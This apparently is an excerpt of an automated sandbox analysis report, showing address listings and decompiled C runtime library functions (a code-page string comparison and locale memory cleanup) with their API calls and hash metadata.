                                                                                                                                                                          0x00a0286d
                                                                                                                                                                          0x00a0288c
                                                                                                                                                                          0x00a0288e
                                                                                                                                                                          0x00a02897
                                                                                                                                                                          0x00a0289d
                                                                                                                                                                          0x00a028a0
                                                                                                                                                                          0x00a028a0
                                                                                                                                                                          0x00a028a3
                                                                                                                                                                          0x00a028a6
                                                                                                                                                                          0x00a028a6
                                                                                                                                                                          0x00a028b6
                                                                                                                                                                          0x00a028c4
                                                                                                                                                                          0x00a028c9
                                                                                                                                                                          0x00a028d0
                                                                                                                                                                          0x00a028d2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a028d8
                                                                                                                                                                          0x00a028de
                                                                                                                                                                          0x00a028eb
                                                                                                                                                                          0x00a028f4
                                                                                                                                                                          0x00a028fa
                                                                                                                                                                          0x00a02907
                                                                                                                                                                          0x00a0290e
                                                                                                                                                                          0x00a02913
                                                                                                                                                                          0x00a02916
                                                                                                                                                                          0x00a02918
                                                                                                                                                                          0x00a02b56
                                                                                                                                                                          0x00a02b5c
                                                                                                                                                                          0x00a02b5d
                                                                                                                                                                          0x00a02b5e
                                                                                                                                                                          0x00a02b5f
                                                                                                                                                                          0x00a02b60
                                                                                                                                                                          0x00a02b61
                                                                                                                                                                          0x00a02b66
                                                                                                                                                                          0x00a02b69
                                                                                                                                                                          0x00a02b6c
                                                                                                                                                                          0x00a02b6d
                                                                                                                                                                          0x00a02b7f
                                                                                                                                                                          0x00a02b84
                                                                                                                                                                          0x00a02b86
                                                                                                                                                                          0x00a02b8f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02b8f
                                                                                                                                                                          0x00a02b88
                                                                                                                                                                          0x00a02b8b
                                                                                                                                                                          0x00a02b8d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02b95
                                                                                                                                                                          0x00a0291e
                                                                                                                                                                          0x00a0291e
                                                                                                                                                                          0x00a0292c
                                                                                                                                                                          0x00a0292f
                                                                                                                                                                          0x00a02945
                                                                                                                                                                          0x00a0294c
                                                                                                                                                                          0x00a02951
                                                                                                                                                                          0x00a02931
                                                                                                                                                                          0x00a02931
                                                                                                                                                                          0x00a02939
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0293b
                                                                                                                                                                          0x00a0293b
                                                                                                                                                                          0x00a02941
                                                                                                                                                                          0x00a02941
                                                                                                                                                                          0x00a02939
                                                                                                                                                                          0x00a02958
                                                                                                                                                                          0x00a0295f
                                                                                                                                                                          0x00a02962
                                                                                                                                                                          0x00a02a60
                                                                                                                                                                          0x00a02a63
                                                                                                                                                                          0x00a02a70
                                                                                                                                                                          0x00a02a73
                                                                                                                                                                          0x00a02a7b
                                                                                                                                                                          0x00a02a7b
                                                                                                                                                                          0x00a02a65
                                                                                                                                                                          0x00a02a6b
                                                                                                                                                                          0x00a02a6b
                                                                                                                                                                          0x00a02968
                                                                                                                                                                          0x00a02968
                                                                                                                                                                          0x00a02974
                                                                                                                                                                          0x00a0297a
                                                                                                                                                                          0x00a02980
                                                                                                                                                                          0x00a02983
                                                                                                                                                                          0x00a02989
                                                                                                                                                                          0x00a0298c
                                                                                                                                                                          0x00a0298f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02991
                                                                                                                                                                          0x00a0299a
                                                                                                                                                                          0x00a0299e
                                                                                                                                                                          0x00a029a7
                                                                                                                                                                          0x00a029ab
                                                                                                                                                                          0x00a029ac
                                                                                                                                                                          0x00a029b2
                                                                                                                                                                          0x00a029b8
                                                                                                                                                                          0x00a029be
                                                                                                                                                                          0x00a029c1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a029c3
                                                                                                                                                                          0x00a029e2
                                                                                                                                                                          0x00a029e2
                                                                                                                                                                          0x00a029e5
                                                                                                                                                                          0x00a02a02
                                                                                                                                                                          0x00a02a07
                                                                                                                                                                          0x00a02a0a
                                                                                                                                                                          0x00a02a0c
                                                                                                                                                                          0x00a02a4a
                                                                                                                                                                          0x00a02a0e
                                                                                                                                                                          0x00a02a0e
                                                                                                                                                                          0x00a02a14
                                                                                                                                                                          0x00a02a19
                                                                                                                                                                          0x00a02a21
                                                                                                                                                                          0x00a02a22
                                                                                                                                                                          0x00a02a22
                                                                                                                                                                          0x00a02a39
                                                                                                                                                                          0x00a02a40
                                                                                                                                                                          0x00a02a43
                                                                                                                                                                          0x00a02a45
                                                                                                                                                                          0x00a02a45
                                                                                                                                                                          0x00a02a50
                                                                                                                                                                          0x00a02a56
                                                                                                                                                                          0x00a02a56
                                                                                                                                                                          0x00a02a5b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02a5b
                                                                                                                                                                          0x00a029c5
                                                                                                                                                                          0x00a029c7
                                                                                                                                                                          0x00a029cc
                                                                                                                                                                          0x00a029d2
                                                                                                                                                                          0x00a029db
                                                                                                                                                                          0x00a029de
                                                                                                                                                                          0x00a029de
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a029c7
                                                                                                                                                                          0x00a02a7e
                                                                                                                                                                          0x00a02a7e
                                                                                                                                                                          0x00a02a82
                                                                                                                                                                          0x00a02a8a
                                                                                                                                                                          0x00a02a90
                                                                                                                                                                          0x00a02a93
                                                                                                                                                                          0x00a02a99
                                                                                                                                                                          0x00a02a9b
                                                                                                                                                                          0x00a02ae7
                                                                                                                                                                          0x00a02aed
                                                                                                                                                                          0x00a02b39
                                                                                                                                                                          0x00a02b39
                                                                                                                                                                          0x00a02aef
                                                                                                                                                                          0x00a02af4
                                                                                                                                                                          0x00a02af4
                                                                                                                                                                          0x00a02afa
                                                                                                                                                                          0x00a02afe
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02b00
                                                                                                                                                                          0x00a02b04
                                                                                                                                                                          0x00a02b0d
                                                                                                                                                                          0x00a02b19
                                                                                                                                                                          0x00a02b1e
                                                                                                                                                                          0x00a02b27
                                                                                                                                                                          0x00a02b2d
                                                                                                                                                                          0x00a02b30
                                                                                                                                                                          0x00a02b30
                                                                                                                                                                          0x00a02afe
                                                                                                                                                                          0x00a02b3f
                                                                                                                                                                          0x00a02b47
                                                                                                                                                                          0x00a02b4d
                                                                                                                                                                          0x00a02b50
                                                                                                                                                                          0x00a02a9d
                                                                                                                                                                          0x00a02aa3
                                                                                                                                                                          0x00a02aad
                                                                                                                                                                          0x00a02abf
                                                                                                                                                                          0x00a02ac6
                                                                                                                                                                          0x00a02ad3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02ad3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02a9b
                                                                                                                                                                          0x00a02918
                                                                                                                                                                          0x00a02890
                                                                                                                                                                          0x00a02890
                                                                                                                                                                          0x00a02ad8
                                                                                                                                                                          0x00a02adb
                                                                                                                                                                          0x00a02adc
                                                                                                                                                                          0x00a02adf
                                                                                                                                                                          0x00a02ae6
                                                                                                                                                                          0x00a02ae6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0288e
                                                                                                                                                                          0x00a02887
                                                                                                                                                                          0x00a02889
                                                                                                                                                                          0x00a02889
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02889
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A041D0: GetLastError.KERNEL32(?,00000000,?,009FD25E,00000000,00000000,?,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A041D5
                                                                                                                                                                            • Part of subcall function 00A041D0: SetLastError.KERNEL32(00000000,00000002,000000FF,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A04273
                                                                                                                                                                          • _free.LIBCMT ref: 00A02AAD
                                                                                                                                                                          • _free.LIBCMT ref: 00A02AC6
                                                                                                                                                                          • _free.LIBCMT ref: 00A02B04
                                                                                                                                                                          • _free.LIBCMT ref: 00A02B0D
                                                                                                                                                                          • _free.LIBCMT ref: 00A02B19
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3291180501-0
                                                                                                                                                                          • Opcode ID: 922a17952bd7151bd1efae8375cc81eb1b54d3ae87c88ba818eba77051eccdd3
                                                                                                                                                                          • Instruction ID: fda62dba47c40c0d8135f2e7f8e1b0d261e06cc16f012cb4a1a263f3565ef2f0
                                                                                                                                                                          • Opcode Fuzzy Hash: 922a17952bd7151bd1efae8375cc81eb1b54d3ae87c88ba818eba77051eccdd3
                                                                                                                                                                          • Instruction Fuzzy Hash: 67B15D75A013199FDB24DF18D888BADB3B5FF58354F5085A9E94AA7390DB30AE90CF40
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A12BF5 Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                          			E00A12BF5(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t55;
				intOrPtr* _t60;
				int _t62;
				signed int _t65;
				signed int _t66;
				intOrPtr* _t67;
				void* _t69;
				signed int _t70;
				signed int _t71;
				intOrPtr* _t77;
				char* _t79;
				char* _t80;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr* _t102;
				signed int _t104;
				void* _t105;
				intOrPtr* _t107;
				void* _t108;
				intOrPtr* _t109;

				_t55 =  *0xa44bac; // 0x96877b9b
				_v8 = _t55 ^ _t104;
				_t103 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t59 = _a24;
				_v40 = _a24;
				_t102 = _a16;
				_v36 = _t102;
				if(_t103 <= 0) {
					if(_t103 < 0xffffffff) {
						goto L60;
					} else {
						goto L3;
					}
				} else {
					_t103 = E00A0082D(_t102, _t103);
					_t59 = _v40;
					L3:
					_t85 = _a28;
					if(_t85 <= 0) {
						if(_t85 < 0xffffffff) {
							goto L60;
						} else {
							goto L6;
						}
					} else {
						_t85 = E00A0082D(_t59, _t85);
						L6:
						_t62 = _a32;
						if(_t62 == 0) {
							_t62 =  *( *_v44 + 8);
							_a32 = _t62;
						}
						if(_t103 == 0 || _t85 == 0) {
							if(_t103 == _t85) {
								L59:
								_push(2);
								goto L22;
							} else {
								if(_t85 > 1) {
									L31:
									_t60 = 1;
								} else {
									if(_t103 > 1) {
										L21:
										_push(3);
										goto L22;
									} else {
										if(GetCPInfo(_t62,  &_v28) == 0) {
											goto L60;
										} else {
											if(_t103 <= 0) {
												if(_t85 <= 0) {
													goto L32;
												} else {
													if(_v28 >= 2) {
														_t79 =  &_v22;
														if(_v22 != 0) {
															_t103 = _v40;
															while(1) {
																_t95 =  *((intOrPtr*)(_t79 + 1));
																if(_t95 == 0) {
																	goto L31;
																}
																_t101 =  *_t103;
																if(_t101 <  *_t79 || _t101 > _t95) {
																	_t79 = _t79 + 2;
																	if( *_t79 != 0) {
																		continue;
																	} else {
																		goto L31;
																	}
																} else {
																	goto L59;
																}
																goto L61;
															}
														}
													}
													goto L31;
												}
											} else {
												if(_v28 >= 2) {
													_t80 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t96 =  *((intOrPtr*)(_t80 + 1));
															if(_t96 == 0) {
																goto L21;
															}
															_t101 =  *_t102;
															if(_t101 <  *_t80 || _t101 > _t96) {
																_t80 = _t80 + 2;
																if( *_t80 != 0) {
																	continue;
																} else {
																	goto L21;
																}
															} else {
																goto L59;
															}
															goto L22;
														}
													}
												}
												goto L21;
												L22:
												_pop(_t60);
											}
										}
									}
								}
							}
						} else {
							L32:
							_t102 = 0;
							_t65 = E00A0B015(_a32, 9, _v36, _t103, 0, 0);
							_t107 = _t105 + 0x18;
							_v44 = _t65;
							if(_t65 == 0) {
								L60:
								_t60 = 0;
							} else {
								_t101 = _t65 + _t65 + 8;
								asm("sbb eax, eax");
								_t66 = _t65 & _t65 + _t65 + 0x00000008;
								if(_t66 == 0) {
									_t67 = 0;
									_v32 = 0;
									goto L41;
								} else {
									if(_t66 > 0x400) {
										_t77 = E00A04E1F(_t66);
										_v32 = _t77;
										if(_t77 == 0) {
											goto L57;
										} else {
											 *_t77 = 0xdddd;
											goto L39;
										}
									} else {
										E009F9050(_t66);
										_t77 = _t107;
										_v32 = _t77;
										if(_t77 == 0) {
											L57:
											_t85 = _v32;
										} else {
											 *_t77 = 0xcccc;
											L39:
											_t67 = _t77 + 8;
											_v32 = _t67;
											L41:
											if(_t67 == 0) {
												goto L57;
											} else {
												_t103 = _a32;
												_t69 = E00A0B015(_a32, 1, _v36, _a32, _t67, _v44);
												_t108 = _t107 + 0x18;
												if(_t69 == 0) {
													goto L57;
												} else {
													_t70 = E00A0B015(_t103, 9, _v40, _t85, _t102, _t102);
													_t109 = _t108 + 0x18;
													_v36 = _t70;
													if(_t70 == 0) {
														goto L57;
													} else {
														_t101 = _t70 + _t70 + 8;
														asm("sbb eax, eax");
														_t71 = _t70 & _t70 + _t70 + 0x00000008;
														if(_t71 == 0) {
															_t103 = _t102;
															goto L52;
														} else {
															if(_t71 > 0x400) {
																_t103 = E00A04E1F(_t71);
																if(_t103 == 0) {
																	goto L55;
																} else {
																	 *_t103 = 0xdddd;
																	goto L50;
																}
															} else {
																E009F9050(_t71);
																_t103 = _t109;
																if(_t103 == 0) {
																	L55:
																	_t85 = _v32;
																} else {
																	 *_t103 = 0xcccc;
																	L50:
																	_t103 = _t103 + 8;
																	L52:
																	if(_t103 == 0 || E00A0B015(_a32, 1, _v40, _t85, _t103, _v36) == 0) {
																		goto L55;
																	} else {
																		_t85 = _v32;
																		_t102 = E00A06389(_v48, _a12, _v32, _v44, _t103, _v36, _t102, _t102, _t102);
																	}
																}
															}
														}
														E009F886F(_t103);
													}
												}
											}
										}
									}
								}
								E009F886F(_t85);
								_t60 = _t102;
							}
						}
					}
				}
				L61:
				return E009F8F7D(_t60, _t85, _v8 ^ _t104, _t101, _t102, _t103);
			}



































                                                                                                                                                                          0x00a12bfd
                                                                                                                                                                          0x00a12c04
                                                                                                                                                                          0x00a12c0c
                                                                                                                                                                          0x00a12c0f
                                                                                                                                                                          0x00a12c15
                                                                                                                                                                          0x00a12c18
                                                                                                                                                                          0x00a12c1b
                                                                                                                                                                          0x00a12c1f
                                                                                                                                                                          0x00a12c22
                                                                                                                                                                          0x00a12c27
                                                                                                                                                                          0x00a12c3c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12c29
                                                                                                                                                                          0x00a12c31
                                                                                                                                                                          0x00a12c33
                                                                                                                                                                          0x00a12c42
                                                                                                                                                                          0x00a12c42
                                                                                                                                                                          0x00a12c47
                                                                                                                                                                          0x00a12c59
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12c49
                                                                                                                                                                          0x00a12c52
                                                                                                                                                                          0x00a12c5f
                                                                                                                                                                          0x00a12c5f
                                                                                                                                                                          0x00a12c64
                                                                                                                                                                          0x00a12c6b
                                                                                                                                                                          0x00a12c6e
                                                                                                                                                                          0x00a12c6e
                                                                                                                                                                          0x00a12c73
                                                                                                                                                                          0x00a12c7f
                                                                                                                                                                          0x00a12e65
                                                                                                                                                                          0x00a12e65
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12c85
                                                                                                                                                                          0x00a12c88
                                                                                                                                                                          0x00a12d11
                                                                                                                                                                          0x00a12d13
                                                                                                                                                                          0x00a12c8e
                                                                                                                                                                          0x00a12c91
                                                                                                                                                                          0x00a12cd6
                                                                                                                                                                          0x00a12cd6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12c93
                                                                                                                                                                          0x00a12ca0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12ca6
                                                                                                                                                                          0x00a12ca8
                                                                                                                                                                          0x00a12ce0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12ce2
                                                                                                                                                                          0x00a12ce6
                                                                                                                                                                          0x00a12cec
                                                                                                                                                                          0x00a12cef
                                                                                                                                                                          0x00a12cf1
                                                                                                                                                                          0x00a12cf4
                                                                                                                                                                          0x00a12cf4
                                                                                                                                                                          0x00a12cf9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12cfb
                                                                                                                                                                          0x00a12cff
                                                                                                                                                                          0x00a12d09
                                                                                                                                                                          0x00a12d0f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12cff
                                                                                                                                                                          0x00a12cf4
                                                                                                                                                                          0x00a12cef
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12ce6
                                                                                                                                                                          0x00a12caa
                                                                                                                                                                          0x00a12cae
                                                                                                                                                                          0x00a12cb4
                                                                                                                                                                          0x00a12cb7
                                                                                                                                                                          0x00a12cb9
                                                                                                                                                                          0x00a12cb9
                                                                                                                                                                          0x00a12cbe
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12cc0
                                                                                                                                                                          0x00a12cc4
                                                                                                                                                                          0x00a12cce
                                                                                                                                                                          0x00a12cd4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12cc4
                                                                                                                                                                          0x00a12cb9
                                                                                                                                                                          0x00a12cb7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12cd8
                                                                                                                                                                          0x00a12cd8
                                                                                                                                                                          0x00a12cd8
                                                                                                                                                                          0x00a12ca8
                                                                                                                                                                          0x00a12ca0
                                                                                                                                                                          0x00a12c91
                                                                                                                                                                          0x00a12c88
                                                                                                                                                                          0x00a12d19
                                                                                                                                                                          0x00a12d19
                                                                                                                                                                          0x00a12d19
                                                                                                                                                                          0x00a12d26
                                                                                                                                                                          0x00a12d2b
                                                                                                                                                                          0x00a12d2e
                                                                                                                                                                          0x00a12d33
                                                                                                                                                                          0x00a12e6c
                                                                                                                                                                          0x00a12e6c
                                                                                                                                                                          0x00a12d39
                                                                                                                                                                          0x00a12d3c
                                                                                                                                                                          0x00a12d41
                                                                                                                                                                          0x00a12d43
                                                                                                                                                                          0x00a12d45
                                                                                                                                                                          0x00a12d88
                                                                                                                                                                          0x00a12d8a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12d47
                                                                                                                                                                          0x00a12d4c
                                                                                                                                                                          0x00a12d69
                                                                                                                                                                          0x00a12d6e
                                                                                                                                                                          0x00a12d74
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12d7a
                                                                                                                                                                          0x00a12d7a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12d7a
                                                                                                                                                                          0x00a12d4e
                                                                                                                                                                          0x00a12d4e
                                                                                                                                                                          0x00a12d53
                                                                                                                                                                          0x00a12d55
                                                                                                                                                                          0x00a12d5a
                                                                                                                                                                          0x00a12e57
                                                                                                                                                                          0x00a12e57
                                                                                                                                                                          0x00a12d60
                                                                                                                                                                          0x00a12d60
                                                                                                                                                                          0x00a12d80
                                                                                                                                                                          0x00a12d80
                                                                                                                                                                          0x00a12d83
                                                                                                                                                                          0x00a12d8d
                                                                                                                                                                          0x00a12d8f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12d95
                                                                                                                                                                          0x00a12d9d
                                                                                                                                                                          0x00a12da3
                                                                                                                                                                          0x00a12da8
                                                                                                                                                                          0x00a12dad
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12db3
                                                                                                                                                                          0x00a12dbc
                                                                                                                                                                          0x00a12dc1
                                                                                                                                                                          0x00a12dc4
                                                                                                                                                                          0x00a12dc9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12dcf
                                                                                                                                                                          0x00a12dd2
                                                                                                                                                                          0x00a12dd7
                                                                                                                                                                          0x00a12dd9
                                                                                                                                                                          0x00a12ddb
                                                                                                                                                                          0x00a12e0f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12ddd
                                                                                                                                                                          0x00a12de2
                                                                                                                                                                          0x00a12dfd
                                                                                                                                                                          0x00a12e02
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12e04
                                                                                                                                                                          0x00a12e04
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12e04
                                                                                                                                                                          0x00a12de4
                                                                                                                                                                          0x00a12de4
                                                                                                                                                                          0x00a12de9
                                                                                                                                                                          0x00a12ded
                                                                                                                                                                          0x00a12e4b
                                                                                                                                                                          0x00a12e4b
                                                                                                                                                                          0x00a12def
                                                                                                                                                                          0x00a12def
                                                                                                                                                                          0x00a12e0a
                                                                                                                                                                          0x00a12e0a
                                                                                                                                                                          0x00a12e11
                                                                                                                                                                          0x00a12e13
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a12e2e
                                                                                                                                                                          0x00a12e2e
                                                                                                                                                                          0x00a12e47
                                                                                                                                                                          0x00a12e47
                                                                                                                                                                          0x00a12e13
                                                                                                                                                                          0x00a12ded
                                                                                                                                                                          0x00a12de2
                                                                                                                                                                          0x00a12e4f
                                                                                                                                                                          0x00a12e54
                                                                                                                                                                          0x00a12dc9
                                                                                                                                                                          0x00a12dad
                                                                                                                                                                          0x00a12d8f
                                                                                                                                                                          0x00a12d5a
                                                                                                                                                                          0x00a12d4c
                                                                                                                                                                          0x00a12e5b
                                                                                                                                                                          0x00a12e61
                                                                                                                                                                          0x00a12e61
                                                                                                                                                                          0x00a12d33
                                                                                                                                                                          0x00a12c73
                                                                                                                                                                          0x00a12c47
                                                                                                                                                                          0x00a12e6e
                                                                                                                                                                          0x00a12e7f

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCPInfo.KERNEL32(00B77140,00B77140,?,7FFFFFFF,?,?,00A12EB1,00B77140,00B77140,?,00B77140,?,?,?,?,00B77140), ref: 00A12C98
                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00A12D4E
                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00A12DE4
                                                                                                                                                                          • __freea.LIBCMT ref: 00A12E4F
                                                                                                                                                                          • __freea.LIBCMT ref: 00A12E5B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __alloca_probe_16__freea$Info
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2330168043-0
                                                                                                                                                                          • Opcode ID: 589cdc26bf410cc58099374ffbbbe2617554432fa73a535b03b56cc5eb542c8c
                                                                                                                                                                          • Instruction ID: 880814d2786b41191753ae831588877e4c3bcf988e77e9a5e57fb23dcc98df13
                                                                                                                                                                          • Opcode Fuzzy Hash: 589cdc26bf410cc58099374ffbbbe2617554432fa73a535b03b56cc5eb542c8c
                                                                                                                                                                          • Instruction Fuzzy Hash: BC81B172D002599FDF209FA4DC41FEF7BB5AF49750F180159EA14AB291E725CCA0CBA0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0D054 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00A0D054(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xa44bf0; // 0xa44c44
					if(_t23 != 0) {
						E00A0447F(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xa44bf4; // 0xa46238
					if(_t24 != 0) {
						E00A0447F(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xa44bf8; // 0xa46238
					if(_t25 != 0) {
						E00A0447F(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xa44c20; // 0xa44c48
					if(_t26 != 0) {
						E00A0447F(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xa44c24; // 0xa4623c
					if(_t27 != 0) {
						return E00A0447F(_t6);
					}
				}
				return _t6;
			}










                                                                                                                                                                          0x00a0d05a
                                                                                                                                                                          0x00a0d05f
                                                                                                                                                                          0x00a0d063
                                                                                                                                                                          0x00a0d069
                                                                                                                                                                          0x00a0d06c
                                                                                                                                                                          0x00a0d071
                                                                                                                                                                          0x00a0d075
                                                                                                                                                                          0x00a0d07b
                                                                                                                                                                          0x00a0d07e
                                                                                                                                                                          0x00a0d083
                                                                                                                                                                          0x00a0d087
                                                                                                                                                                          0x00a0d08d
                                                                                                                                                                          0x00a0d090
                                                                                                                                                                          0x00a0d095
                                                                                                                                                                          0x00a0d099
                                                                                                                                                                          0x00a0d09f
                                                                                                                                                                          0x00a0d0a2
                                                                                                                                                                          0x00a0d0a7
                                                                                                                                                                          0x00a0d0a8
                                                                                                                                                                          0x00a0d0ab
                                                                                                                                                                          0x00a0d0b1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0d0b9
                                                                                                                                                                          0x00a0d0b1
                                                                                                                                                                          0x00a0d0bc

                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D06C
                                                                                                                                                                            • Part of subcall function 00A0447F: HeapFree.KERNEL32(00000000,00000000,?,00A0D2F5,?,00000000,?,00000002,?,00A0D598,?,00000007,?,?,00A0DA8B,?), ref: 00A04495
                                                                                                                                                                            • Part of subcall function 00A0447F: GetLastError.KERNEL32(?,?,00A0D2F5,?,00000000,?,00000002,?,00A0D598,?,00000007,?,?,00A0DA8B,?,?), ref: 00A044A7
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D07E
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D090
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D0A2
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D0B4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
